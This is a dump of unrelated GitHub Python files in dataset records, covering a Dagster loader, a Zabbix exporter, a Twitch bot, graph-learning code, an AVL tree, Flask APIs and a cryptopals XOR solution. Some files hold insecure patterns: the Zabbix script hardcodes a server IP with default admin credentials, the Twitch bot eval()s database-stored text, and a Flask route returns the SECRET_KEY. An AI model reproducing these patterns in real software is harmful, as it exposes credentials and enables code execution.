Instead, use\n :py:meth:`~dagster.RepositoryDefinition.get_asset_value_loader`.\n \"\"\"\n\n def __init__(\n self,\n assets_defs_by_key: Mapping[AssetKey, AssetsDefinition],\n source_assets_by_key: Mapping[AssetKey, SourceAsset],\n instance: Optional[DagsterInstance] = None,\n ):\n self._assets_defs_by_key = assets_defs_by_key\n self._source_assets_by_key = source_assets_by_key\n self._resource_instance_cache: Dict[str, object] = {}\n self._exit_stack: ExitStack = ExitStack().__enter__()\n if not instance and is_dagster_home_set():\n self._instance = self._exit_stack.enter_context(DagsterInstance.get())\n else:\n self._instance = instance\n\n def _ensure_resource_instances_in_cache(\n self,\n resource_defs: Mapping[str, ResourceDefinition],\n resource_config: Optional[Mapping[str, Any]] = None,\n ):\n for built_resource_key, built_resource in (\n self._exit_stack.enter_context(\n build_resources(\n resources={\n resource_key: self._resource_instance_cache.get(resource_key, resource_def)\n for resource_key, resource_def in resource_defs.items()\n },\n instance=self._instance,\n resource_config=resource_config,\n )\n )\n ._asdict()\n .items()\n ):\n self._resource_instance_cache[built_resource_key] = built_resource\n\n @public\n def load_asset_value(\n self,\n asset_key: CoercibleToAssetKey,\n *,\n python_type: Optional[Type[object]] = None,\n partition_key: Optional[str] = None,\n metadata: Optional[Dict[str, Any]] = None,\n resource_config: Optional[Mapping[str, Any]] = None,\n ) -> object:\n \"\"\"Loads the contents of an asset as a Python object.\n\n Invokes `load_input` on the :py:class:`IOManager` associated with the asset.\n\n Args:\n asset_key (Union[AssetKey, Sequence[str], str]): The key of the asset to load.\n python_type (Optional[Type]): The python type to load the asset as. 
This is what will\n be returned inside `load_input` by `context.dagster_type.typing_type`.\n partition_key (Optional[str]): The partition of the asset to load.\n metadata (Optional[Dict[str, Any]]): Input metadata to pass to the :py:class:`IOManager`\n (is equivalent to setting the metadata argument in `In` or `AssetIn`).\n resource_config (Optional[Any]): A dictionary of resource configurations to be passed\n to the :py:class:`IOManager`.\n\n Returns:\n The contents of an asset as a Python object.\n \"\"\"\n asset_key = AssetKey.from_coercible(asset_key)\n resource_config = resource_config or {}\n output_metadata = {}\n\n if asset_key in self._assets_defs_by_key:\n assets_def = self._assets_defs_by_key[asset_key]\n\n resource_defs = merge_dicts(\n {DEFAULT_IO_MANAGER_KEY: default_job_io_manager_with_fs_io_manager_schema},\n assets_def.resource_defs,\n )\n io_manager_key = assets_def.get_io_manager_key_for_asset_key(asset_key)\n io_manager_def = resource_defs[io_manager_key]\n name = assets_def.get_output_name_for_asset_key(asset_key)\n output_metadata = assets_def.metadata_by_key[asset_key]\n op_def = assets_def.get_op_def_for_asset_key(asset_key)\n asset_partitions_def = assets_def.partitions_def\n elif asset_key in self._source_assets_by_key:\n source_asset = self._source_assets_by_key[asset_key]\n\n resource_defs = merge_dicts(\n {DEFAULT_IO_MANAGER_KEY: default_job_io_manager_with_fs_io_manager_schema},\n source_asset.resource_defs,\n )\n io_manager_key = source_asset.get_io_manager_key()\n io_manager_def = resource_defs[io_manager_key]\n name = asset_key.path[-1]\n output_metadata = source_asset.raw_metadata\n op_def = None\n asset_partitions_def = source_asset.partitions_def\n else:\n check.failed(f\"Asset key {asset_key} not found\")\n\n required_resource_keys = get_transitive_required_resource_keys(\n io_manager_def.required_resource_keys, resource_defs\n ) | {io_manager_key}\n\n self._ensure_resource_instances_in_cache(\n {k: v for k, v in resource_defs.items() if k in required_resource_keys},\n resource_config=resource_config,\n )\n io_manager = cast(IOManager, self._resource_instance_cache[io_manager_key])\n\n io_config = resource_config.get(io_manager_key)\n io_resource_config = {io_manager_key: io_config} if io_config else {}\n\n io_manager_config = get_mapped_resource_config(\n {io_manager_key: io_manager_def}, io_resource_config\n )\n\n input_context = build_input_context(\n name=None,\n asset_key=asset_key,\n dagster_type=resolve_dagster_type(python_type),\n upstream_output=build_output_context(\n name=name,\n metadata=output_metadata,\n asset_key=asset_key,\n op_def=op_def,\n resource_config=resource_config,\n ),\n resources=self._resource_instance_cache,\n resource_config=io_manager_config[io_manager_key].config,\n partition_key=partition_key,\n asset_partition_key_range=(\n PartitionKeyRange(partition_key, partition_key)\n if partition_key is not None\n else None\n ),\n asset_partitions_def=asset_partitions_def,\n instance=self._instance,\n metadata=metadata,\n )\n\n return io_manager.load_input(input_context)\n\n def __enter__(self):\n return self\n\n def __exit__(self, *exc):\n self._exit_stack.close()\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster/_core/storage/asset_value_loader.py","file_name":"asset_value_loader.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"86414885","text":"import os\nimport json\nfrom pyzabbix import 
ZabbixAPI\nimport datetime\n\n# Connect to the Zabbix API\nzapi = ZabbixAPI('http://182.93.91.116/zabbix/')\nzapi.login(\"Admin\", \"zabbix\")\n\n# Get the hosts and their status\nhosts = zapi.host.get(output=['hostid', 'name'])\n\nproblem_data = [] # Store problem data\n\nfor host in hosts:\n host_id = host['hostid']\n host_name = host['name']\n\n # Get problems for the host's interfaces\n problems = zapi.problem.get(\n output=['eventid', 'clock', 'severity', 'name'],\n select_acknowledges='extend',\n select_tags='extend',\n hostids=[host_id],\n filter={'value': 1}\n )\n\n for problem in problems:\n problem_start_time = problem['clock']\n problem_severity = problem['severity']\n problem_description = problem['name']\n\n # Convert UNIX timestamp to datetime object\n start_time = datetime.datetime.fromtimestamp(int(problem_start_time)).strftime('%Y-%m-%d %H:%M:%S')\n\n problem_info = {\n 'Time': start_time,\n 'Severity': problem_severity,\n 'Description': problem_description,\n 'Host': host_name\n }\n\n problem_data.append(problem_info)\n\n# Sort problem_data based on descending time\nproblem_data.sort(key=lambda x: x['Time'], reverse=True)\n\n# Disconnect from the Zabbix API\nzapi.user.logout()\n\n# Get the directory of the current script\nscript_dir = os.path.dirname(os.path.abspath(__file__))\nfile_path = os.path.join(script_dir, 'problems.json') # Construct the file path\n\n# Save problem data to JSON file\nwith open(file_path, 'w') as json_file:\n json.dump(problem_data, json_file, indent=4)\n\nprint(\"Problem data saved to 'problems.json' file.\")\n","repo_name":"Anmol2059/zabbixTicket","sub_path":"static/2problems.py","file_name":"2problems.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5094161919","text":"# bot.py\n# The code for our bot\n\nimport cfg\nimport utils\nimport sql\nimport socket\nimport re\nimport time, thread\nfrom time import sleep\n\nclass Command(object):\n cmd = \"\"\n response = \"\"\n description = \"\"\n op = 0\n def __init__(self, cmd, response, description, op):\n self.cmd = cmd\n self.response = response\n self.description = description\n self.op = op\n\ndef parse(c, s):\n if c.response.find(\"~\") > -1:\n list = c.response.split(\"~\")\n for item in list:\n if item.find(\"{\") > -1:\n code = item.split(\"{\")[1].split(\"}\")[0]\n utils.chat(s, item.split(\"{\")[0] + eval(code))\n else:\n utils.chat(s, item)\n else:\n\n if c.response.find(\"{\") > -1:\n code = c.response.split(\"{\")[1].split(\"}\")[0]\n utils.chat(s, c.response.split(\"{\")[0] + eval(code))\n else:\n utils.chat(s, c.response)\n\ndef main():\n # Networking functions\n s = socket.socket()\n s.connect((cfg.HOST, cfg.PORT))\n s.send(\"PASS {}\\r\\n\".format(cfg.PASS).encode(\"utf-8\"))\n s.send(\"NICK {}\\r\\n\".format(cfg.NICK).encode(\"utf-8\"))\n s.send(\"JOIN #{}\\r\\n\".format(cfg.CHAN).encode(\"utf-8\"))\n\n CHAT_MSG = re.compile(r\"^:\\w+!\\w+@\\w+\\.tmi\\.twitch\\.tv PRIVMSG #\\w+ :\")\n utils.chat(s, \"Hi everyone!\")\n\n thread.start_new_thread(utils.threadFillOpList, ())\n\n commands = sql.getCommands()\n\n cmd = []\n for c in commands:\n cmd.append(Command(c[\"Command\"], c[\"Response\"], c[\"Description\"], c[\"Op\"]))\n\n while True:\n response = s.recv(1024).decode(\"utf-8\")\n if response == \"PING :tmi.twitch.tv\\r\\n\":\n s.send(\"PONG :tmi.twitch.tv\\r\\n\".encode(\"utf-8\"))\n else:\n username = re.search(r\"\\w+\", response).group(0)\n message = CHAT_MSG.sub(\"\", 
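            # strips the ':user!user@user.tmi.twitch.tv PRIVMSG #chan :' IRC prefix
            # matched by CHAT_MSG above, so only the chat message text remains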
response)\n print(response)\n\n for c in cmd:\n if message.strip() == c.cmd:\n if c.op == 0:\n parse(c, s)\n else:\n if utils.isOp(username):\n parse(c, s)\n sleep(1)\n utils.chat(s, \"Bye everyone :)\");\nif __name__ == \"__main__\":\n main()","repo_name":"Limeoats/Creating-a-Twitch-Bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"31961249726","text":"import dgl\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom dgl.nn import GraphConv\nfrom ogb.linkproppred import DglLinkPropPredDataset, Evaluator\nfrom torch.utils.data import DataLoader\nimport argparse\n\n\n# Define the GCN model\nclass GCN(nn.Module):\n def __init__(self, in_feats, hid_feats, emb_feats):\n super(GCN, self).__init__()\n self.conv1 = GraphConv(in_feats, hid_feats)\n self.conv2 = GraphConv(hid_feats, emb_feats)\n self.dropout = nn.Dropout(0.2)\n\n def forward(self, graph, x):\n # Move the input to the device of the graph\n x = x.to(graph.device)\n\n # Compute node embeddings\n x = self.conv1(graph, x)\n x = F.relu(x)\n x = self.dropout(x)\n x = self.conv2(graph, x)\n return x\n\n\n# Define the link prediction model\nclass LinkPredictor(nn.Module):\n def __init__(self, emb_feats, hid_feats, out_feats):\n super(LinkPredictor, self).__init__()\n self.lin1 = nn.Linear(emb_feats, hid_feats)\n self.lin2 = nn.Linear(hid_feats, out_feats)\n self.dropout = nn.Dropout(0.2)\n\n def forward(self, i_emb, j_emb):\n # Compute the link prediction scores\n x = i_emb * j_emb\n x = self.lin1(x)\n x = F.relu(x)\n x = self.dropout(x)\n x = self.lin2(x)\n\n # Use sigmoid to normalize the scores to be between 0 and 1\n return torch.sigmoid(x)\n\n\ndef train(model, predictor, graph, split_edge, optimizer, batch_size):\n # Set the model to train mode\n model.train()\n predictor.train()\n\n # Find the device for the graph\n device = graph.device\n\n # Get the train edges and move them to the device\n train_edges = split_edge[\"train\"][\"edge\"].to(device)\n train_feats = graph.ndata[\"feat\"]\n\n # Initialize the loss and number of examples\n total_loss = total_examples = 0\n\n # Sample a batch of edges\n for perm in DataLoader(range(train_edges.size(0)), batch_size, shuffle=True):\n # Clear the gradients\n optimizer.zero_grad()\n\n # Compute node embeddings\n emb_x = model(graph, train_feats)\n\n # Predict positive edges\n edge = train_edges[perm].t().to(device)\n pos_out = predictor(emb_x[edge[0]], emb_x[edge[1]])\n pos_loss = -torch.log(pos_out + 1e-15).mean()\n\n # Generate negative edges\n edge = torch.randint(\n 0, graph.num_nodes(), edge.size(), dtype=torch.long, device=emb_x.device\n )\n\n # Predict negative edges\n neg_out = predictor(emb_x[edge[0]], emb_x[edge[1]])\n neg_loss = -torch.log(1 - neg_out + 1e-15).mean()\n loss = pos_loss + neg_loss\n\n # Backward and update\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\n torch.nn.utils.clip_grad_norm_(predictor.parameters(), 1.0)\n optimizer.step()\n\n # Compute the loss and number of examples\n num_examples = pos_out.size(0)\n total_loss += loss.item() * num_examples\n total_examples += num_examples\n\n return total_loss / total_examples\n\n\n@torch.no_grad()\ndef eval(model, predictor, graph, split_edge, evaluator, batch_size):\n # Set the model to evaluation mode\n model.eval()\n predictor.eval()\n\n # Find the device for the graph\n device = graph.device\n\n # Get different splitted 
edges and move them to the device\n pos_train_edges = split_edge[\"train\"][\"edge\"].to(device)\n pos_valid_edges = split_edge[\"valid\"][\"edge\"].to(device)\n neg_valid_edges = split_edge[\"valid\"][\"edge_neg\"].to(device)\n pos_test_edges = split_edge[\"test\"][\"edge\"].to(device)\n neg_test_edges = split_edge[\"test\"][\"edge_neg\"].to(device)\n feats = graph.ndata[\"feat\"]\n\n # Compute node embeddings\n emb_x = model(graph, feats)\n\n pos_train_preds = []\n for perm in DataLoader(range(pos_train_edges.size(0)), batch_size, shuffle=False):\n edge = pos_train_edges[perm].t()\n pos_train_preds.append(predictor(emb_x[edge[0]], emb_x[edge[1]]).squeeze())\n pos_train_preds = torch.cat(pos_train_preds, dim=0)\n\n pos_valid_preds = []\n for perm in DataLoader(range(pos_valid_edges.size(0)), batch_size, shuffle=False):\n edge = pos_valid_edges[perm].t()\n pos_valid_preds.append(predictor(emb_x[edge[0]], emb_x[edge[1]]).squeeze())\n pos_valid_preds = torch.cat(pos_valid_preds, dim=0)\n\n neg_valid_preds = []\n for perm in DataLoader(range(neg_valid_edges.size(0)), batch_size, shuffle=False):\n edge = neg_valid_edges[perm].t()\n neg_valid_preds.append(predictor(emb_x[edge[0]], emb_x[edge[1]]).squeeze())\n neg_valid_preds = torch.cat(neg_valid_preds, dim=0)\n\n pos_test_preds = []\n for perm in DataLoader(range(pos_test_edges.size(0)), batch_size, shuffle=False):\n edge = pos_test_edges[perm].t()\n pos_test_preds.append(predictor(emb_x[edge[0]], emb_x[edge[1]]).squeeze().cpu())\n pos_test_preds = torch.cat(pos_test_preds, dim=0)\n\n neg_test_preds = []\n for perm in DataLoader(range(neg_test_edges.size(0)), batch_size, shuffle=False):\n edge = neg_test_edges[perm].t()\n neg_test_preds.append(predictor(emb_x[edge[0]], emb_x[edge[1]]).squeeze().cpu())\n neg_test_preds = torch.cat(neg_test_preds, dim=0)\n\n evaluator.K = 50\n train_hits = evaluator.eval(\n {\n \"y_pred_pos\": pos_train_preds,\n \"y_pred_neg\": neg_valid_preds,\n }\n )[\"hits@50\"]\n valid_hits = evaluator.eval(\n {\n \"y_pred_pos\": pos_valid_preds,\n \"y_pred_neg\": neg_valid_preds,\n }\n )[\"hits@50\"]\n test_hits = evaluator.eval(\n {\n \"y_pred_pos\": pos_test_preds,\n \"y_pred_neg\": neg_test_preds,\n }\n )[\"hits@50\"]\n\n results = [train_hits, valid_hits, test_hits]\n\n return results\n\n\ndef main():\n # Create the argument parser and parse the command-line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--save\",\n type=int,\n default=100,\n help=\"specify how many epochs to run before saving the model\",\n )\n parser.add_argument(\n \"--epochs\",\n type=int,\n default=400,\n help=\"specify how many epochs to run in total\",\n )\n parser.add_argument(\n \"--batch_size\",\n type=int,\n default=65536,\n help=\"specify the batch size during training and testing\",\n )\n parser.add_argument(\"--eval_steps\", type=int, default=1)\n\n # Parse the command-line arguments\n args = parser.parse_args()\n\n # Use GPU if available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(\"Using device:\", device)\n\n # Load dataset\n dataset = DglLinkPropPredDataset(name=\"ogbl-collab\")\n split_edge = dataset.get_edge_split()\n graph = dataset[0]\n\n # Add self-loops to the graph\n graph = graph.add_self_loop()\n\n # Prepare features\n in_feats = graph.ndata[\"feat\"].shape[1]\n train_feats = graph.ndata[\"feat\"]\n\n # Create model and optimizer\n emb_feats = 256\n hid_feats = 256\n model = GCN(in_feats, hid_feats, emb_feats).to(device)\n predictor = LinkPredictor(emb_feats, 
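    # in: emb_feats-dimensional node embeddings; out: one link-probability score.
    # LinkPredictor (defined above) multiplies the two endpoint embeddings
    # elementwise before the MLP, see its forward() method.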
hid_feats, 1).to(device)\n optimizer = torch.optim.Adam(\n list(model.parameters()) + list(predictor.parameters()), lr=0.0005\n )\n\n # Move graph to device\n graph = graph.to(device)\n\n # Set the number of epochs and the batch size\n batch_size = args.batch_size\n epochs = args.epochs + 1\n for epoch in range(epochs):\n print(f\"Training epoch {epoch}...\")\n\n # Train model\n loss = train(model, predictor, graph, split_edge, optimizer, batch_size)\n print(f\"train loss: {loss}\")\n\n # Evaluate model\n if epoch % args.eval_steps == 0:\n evaluator = Evaluator(name=\"ogbl-collab\")\n result = eval(model, predictor, graph, split_edge, evaluator, batch_size)\n print(f\"hits@50: {result}\")\n\n print(f\"Finished epoch {epoch}\\n\")\n\n # Save the model checkpoint if epoch is multiple of 10\n save = args.save\n if epoch % save != 0:\n continue\n torch.save(\n {\n \"epoch\": epoch,\n \"model_state_dict\": model.state_dict(),\n \"predictor_state_dict\": predictor.state_dict(),\n \"optimizer_state_dict\": optimizer.state_dict(),\n \"loss\": loss,\n },\n f\"GCN_checkpoint_epoch{epoch}.pt\",\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HuFY-dev/GEMS-GCN","sub_path":"link_predict.py","file_name":"link_predict.py","file_ext":"py","file_size_in_byte":8514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36925892204","text":"# Overview\n# In this notebook you will complete the following implementation of the balanced (AVL) binary search tree. \n# Note that you should not be implementing the map-based API described in the plain (unbalanced) BSTree notebook\n# — i.e., nodes in the AVLTree will only contain a single value.\n\nclass AVLTree:\n class Node:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n def rotate_right(self):\n n = self.left\n self.val, n.val = n.val, self.val\n self.left, n.left, self.right, n.right = n.left, n.right, n, self.right\n\n def rotate_left(self):\n n = self.right\n self.val, n.val = n.val, self.val\n self.right, n.right, self.left, n.left = n.right, n.left, n, self.left\n\n @staticmethod\n def height(n):\n if not n:\n return 0\n else:\n return max(1 + AVLTree.Node.height(n.left), 1 + AVLTree.Node.height(n.right))\n\n def __init__(self):\n self.size = 0\n self.root = None\n\n \n @staticmethod\n def rebalance(node):\n if AVLTree.Node.height(node.left) > AVLTree.Node.height(node.right):\n if AVLTree.Node.height(node.left.left) >= AVLTree.Node.height(node.left.right):\n # left-left\n #print('left-left imbalance detected')\n node.rotate_right()\n else:\n # left-right\n #print('left-right imbalance detected')\n node.left.rotate_left()\n node.rotate_right()\n else:\n # right branch imbalance tests needed\n if AVLTree.Node.height(node.right.right) >= AVLTree.Node.height(node.right.left):\n #right-right \n node.rotate_left()\n else:\n #right-left\n node.right.rotate_right()\n node.rotate_left()\n\n def add(self, val): # O(log N)\n assert (val not in self)\n\n def add_rec(node):\n if not node:\n return AVLTree.Node(val)\n elif val < node.val:\n node.left = add_rec(node.left)\n else:\n node.right = add_rec(node.right)\n\n # detect and fix imbalance\n if abs(AVLTree.Node.height(node.left) - AVLTree.Node.height(node.right)) >= 2:\n AVLTree.rebalance(node)\n\n return node\n\n self.root = add_rec(self.root)\n self.size += 1\n\n def __delitem__(self, val): # O(log N)\n assert (val in self)\n\n def delitem_rec(node):\n if val < node.val:\n node.left = 
delitem_rec(node.left)\n elif val > node.val:\n node.right = delitem_rec(node.right)\n else:\n if not node.left and not node.right:\n return None\n elif node.left and not node.right:\n return node.left\n elif node.right and not node.left:\n return node.right\n else:\n to_del = node.left\n if not to_del.right:\n node.left = to_del.left\n else:\n par = to_del\n to_del = par.right\n to_fix = [par]\n while to_del.right:\n par = par.right\n to_fix.append(par)\n to_del = to_del.right\n\n # to_del refers to the right-most node, and par to its parent\n par.right = to_del.left\n\n # to_fix contains all the nodes I need to check for rebalancing\n for n in to_fix[::-1]: # traverse list in reverse\n if abs(AVLTree.Node.height(n.left) - AVLTree.Node.height(n.right)) >= 2:\n AVLTree.rebalance(n)\n\n node.val = to_del.val\n\n # detect and fix imbalance (recursively)\n if abs(AVLTree.Node.height(node.left) - AVLTree.Node.height(node.right)) >= 2:\n AVLTree.rebalance(node)\n\n return node\n\n self.root = delitem_rec(self.root)\n self.size -= 1\n\n def __contains__(self, val):\n def contains_rec(node):\n if not node:\n return False\n elif val < node.val:\n return contains_rec(node.left)\n elif val > node.val:\n return contains_rec(node.right)\n else:\n return True\n\n return contains_rec(self.root)\n\n def __len__(self):\n return self.size\n\n def __iter__(self):\n def iter_rec(node):\n if node:\n yield from iter_rec(node.left)\n yield node.val\n yield from iter_rec(node.right)\n\n yield from iter_rec(self.root)\n\n def pprint(self, width=64):\n \"\"\"Attempts to pretty-print this tree's contents.\"\"\"\n height = self.height()\n nodes = [(self.root, 0)]\n prev_level = 0\n repr_str = ''\n while nodes:\n n, level = nodes.pop(0)\n if prev_level != level:\n prev_level = level\n repr_str += '\\n'\n if not n:\n if level < height - 1:\n nodes.extend([(None, level + 1), (None, level + 1)])\n repr_str += '{val:^{width}}'.format(val='-', width=width // 2 ** level)\n elif n:\n if n.left or level < height - 1:\n nodes.append((n.left, level + 1))\n if n.right or level < height - 1:\n nodes.append((n.right, level + 1))\n repr_str += '{val:^{width}}'.format(val=n.val, width=width // 2 ** level)\n print(repr_str)\n\n def height(self):\n \"\"\"Returns the height of the longest branch of the tree.\"\"\"\n\n def height_rec(t):\n if not t:\n return 0\n else:\n return max(1 + height_rec(t.left), 1 + height_rec(t.right))\n\n return height_rec(self.root)\n","repo_name":"NaserAlkuhili/Data-Structures","sub_path":"AVLTree.py","file_name":"AVLTree.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4704388995","text":"import os\nimport random\nfrom os import environ\nfrom flask import Flask, abort, jsonify, request\nfrom flask_cors import CORS\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql.expression import func\nfrom models import Category, Question, setup_db\n\nQUESTIONS_PER_PAGE = 10\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__)\n app.config[\"SECRET_KEY\"] = os.environ.get('SECRET_KEY')\n setup_db(app)\n\n CORS(app, origins={'*'})\n\n # CORS(app )\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET , POST , PATCH , DELETE , OPTIONS')\n return response\n\n @app.route('/')\n def hello():\n return jsonify({\n 
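            # NOTE: returning the SECRET_KEY in a response exposes it to any client;
            # this endpoint should be treated as local-debug only.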
'SECRET_KEY':app.config[\"SECRET_KEY\"],\n })\n\n @app.route('/categories')\n def get_categories():\n categories = {}\n for category in Category.query.all():\n categories[category.id] = category.type\n return jsonify({\n 'categories': categories,\n \"success\": True\n })\n\n @app.route('/questions', methods=['GET'])\n def get_questions():\n page = request.args.get('page', 1, type=int)\n # start = (page-1) * 10\n # end = start +10\n questions = Question.query.paginate(page, 10)\n\n # total = Question.total\n total = len(Question.query.all())\n questions = questions.items\n\n current_category = Question.category\n\n categories = {}\n for category in Category.query.all():\n categories[category.id] = category.type\n\n questions = [i.format() for i in questions]\n return jsonify({\n 'success': True,\n 'questions': questions,\n 'total': total,\n 'categories': categories,\n })\n\n @app.route('/questions/<int:question_id>', methods=['DELETE'])\n def del_question(question_id):\n deleted_questions = Question.query.filter(\n Question.id == question_id).one_or_none()\n\n if deleted_questions is None:\n abort(404)\n\n else:\n deleted_questions.delete()\n return jsonify({\n 'success': True,\n 'deleted_questions': deleted_questions.format()\n })\n\n @app.route('/questions', methods=['POST'])\n def add_question():\n body = request.get_json()\n question = body.get('question')\n answer = body.get('answer')\n category = body.get('category')\n difficulty = body.get('difficulty')\n\n q = Question(question=question, answer=answer,\n category=category, difficulty=difficulty)\n\n q.insert()\n\n return jsonify({\n 'success': True,\n 'question': q.format()\n })\n\n @app.route('/search', methods=['POST'])\n def search_question():\n body = request.get_json()\n search_term = body.get('searchTerm')\n questions = Question.query.filter(\n Question.question.ilike(f'%{search_term}%')).all()\n questions = [i.format() for i in questions]\n return jsonify({\n 'success': True,\n 'questions': questions\n })\n\n @app.route('/categories/<int:id>/questions', methods=['POST'])\n def get_question_by_category(id):\n category = Category.query.filter_by(id=id).one_or_none()\n questions = Question.query.filter(Question.category == str(id)).all()\n questions = [i.format() for i in questions]\n return jsonify({\n 'success': True,\n 'questions': questions,\n 'current_category': category.type\n })\n\n @app.route('/quizzes', methods=['POST'])\n def play_quiz():\n body = request.get_json()\n previous = body.get('previous_questions')\n category = body.get('quiz_category')\n\n if (category['id'] == \"0\"):\n questions = Question.query.filter(\n Question.id.notin_((previous))).all()\n else:\n questions = Question.query.filter_by(category=category['id']).filter(\n Question.id.notin_((previous))).all()\n\n new_questions = questions[random.randint(0, len(questions)-1)]\n\n return jsonify({\n 'success': True,\n 'question': new_questions.format()\n })\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"page not found\"\n }), 404\n\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": \"unprocessable\"\n }), 422\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": \"bad request\"\n }), 400\n\n @app.errorhandler(405)\n def method_not_allowed(error):\n return jsonify({\n \"success\": False,\n \"error\": 405,\n \"message\": \"method not allowed\"\n }), 405\n\n return 
app\n","repo_name":"noha99/Trivia_API","sub_path":"trivia/backend/flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18051805801","text":"#! /usr/bin/env python3\n\nimport argparse\nimport logging\nimport tqdm\n\nimport requests\nimport pywikibot\nimport pywikibot.proofreadpage\n\nimport utils.range_selection\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='show debugging information')\n parser.add_argument('-i', '--index',\n help='Index name')\n parser.add_argument('-p', '--pages', nargs='+',\n help='the pages to fetch')\n\n args = parser.parse_args()\n\n site = pywikibot.Site('en', 'wikisource')\n\n log_level = logging.DEBUG if args.verbose else logging.INFO\n logging.basicConfig(level=log_level)\n\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n logging.getLogger(\"requests_oauthlib\").setLevel(logging.WARNING)\n logging.getLogger(\"oauthlib\").setLevel(logging.WARNING)\n logging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n\n index = pywikibot.proofreadpage.IndexPage(site, 'Index:' + args.index)\n\n if args.pages:\n pages = utils.range_selection.get_range_selection(\n args.pages, index.num_pages)\n else:\n pages = range(1, index.num_pages + 1)\n\n for i in tqdm.tqdm(pages):\n w = 1024\n img_page = pywikibot.FilePage(site, 'File:' + args.index)\n img_url = img_page.get_file_url(url_param=f'page{i}-{w}px')\n\n url = \"https://ocr.wmcloud.org/api.php\"\n\n params = {\n 'engine': 'tesseract',\n 'langs[]': 'en',\n 'image': img_url,\n 'uselang': 'en'\n }\n\n requests.get(url, data=params)\n logging.debug(params)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"inductiveload/wstools","sub_path":"wstools/prod_ocr.py","file_name":"prod_ocr.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19102503703","text":"from flask import request, Blueprint\nfrom werkzeug.exceptions import (\n BadRequest,\n Conflict,\n NotFound\n)\nfrom app.libs.api_response import ApiResponse\nfrom app.libs.jwt_handler import api_required\nfrom app.model.item import Item, ItemSearchOption\nfrom app.model.mapper.item_mapper import ItemMapper\n\n\nbp = Blueprint('item', __name__, url_prefix='/api/items')\n\n\n@bp.route('/', methods=['GET'])\n@api_required\ndef index():\n option = ItemSearchOption()\n if request.args is not None:\n option.category_id = request.args.get('category_id', type=int)\n option.q = request.args.get('q', type=str)\n\n mapper = ItemMapper()\n items = mapper.find(option)\n\n return ApiResponse(200, data={'items': items})\n\n\n@bp.route('/', methods=['POST'])\n@api_required\ndef add():\n request_data = request.get_json()\n if request_data is None:\n raise BadRequest()\n\n item = Item(**request.json)\n if not item.is_valid():\n raise BadRequest(\n description='保存エラー。エラー内容を確認してください。',\n response=item.validation_errors\n )\n\n mapper = ItemMapper()\n saved = mapper.save(item)\n if not saved:\n raise Conflict()\n\n return ApiResponse(201, message='保存しました')\n\n\n@bp.route('/', methods=['PUT'])\n@api_required\ndef edit(id):\n request_data = request.get_json()\n if request_data is None:\n raise BadRequest()\n\n item = Item(**request.json)\n if not item.is_valid():\n raise BadRequest(\n description='保存エラー。エラー内容を確認してください。',\n 
response=item.validation_errors\n )\n\n mapper = ItemMapper()\n saved = mapper.save(item)\n if not saved:\n raise Conflict()\n\n return ApiResponse(200, message='Updated.')\n\n\n@bp.route('/<int:id>', methods=['DELETE'])\n@api_required\ndef delete(id):\n mapper = ItemMapper()\n deleted = mapper.delete(id)\n if not deleted:\n raise NotFound(description='The requested data has already been deleted or does not exist.')\n\n return ApiResponse(204, 'Deleted.')\n","repo_name":"KentaYamada/siphon","sub_path":"app/controller/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"29361797819","text":"# 2. Fixed XOR - http://cryptopals.com/sets/1/challenges/2\n\n# Write a function that takes two equal-length buffers and produces their XOR combination.\n\nimport binascii\n\ndef XORME(x,y):\n # unhexing both the strings\n h1 = binascii.unhexlify(x)\n h2 = binascii.unhexlify(y)\n\n return binascii.hexlify(bytes(a ^ b for a, b in zip(h1, h2))) # XOR in Python3\n\nx = input(\"Enter String 1: \")\ny = input(\"Enter String 2: \")\n\nprint(\"\\nXOR of String 1 and String 2: \",XORME(x,y).decode(\"utf-8\")) # calling func w/ pretty print\n","repo_name":"jatinkrmalik/the-cryptopals-crypto-challenges-solution","sub_path":"SET 1/01x02.py","file_name":"01x02.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
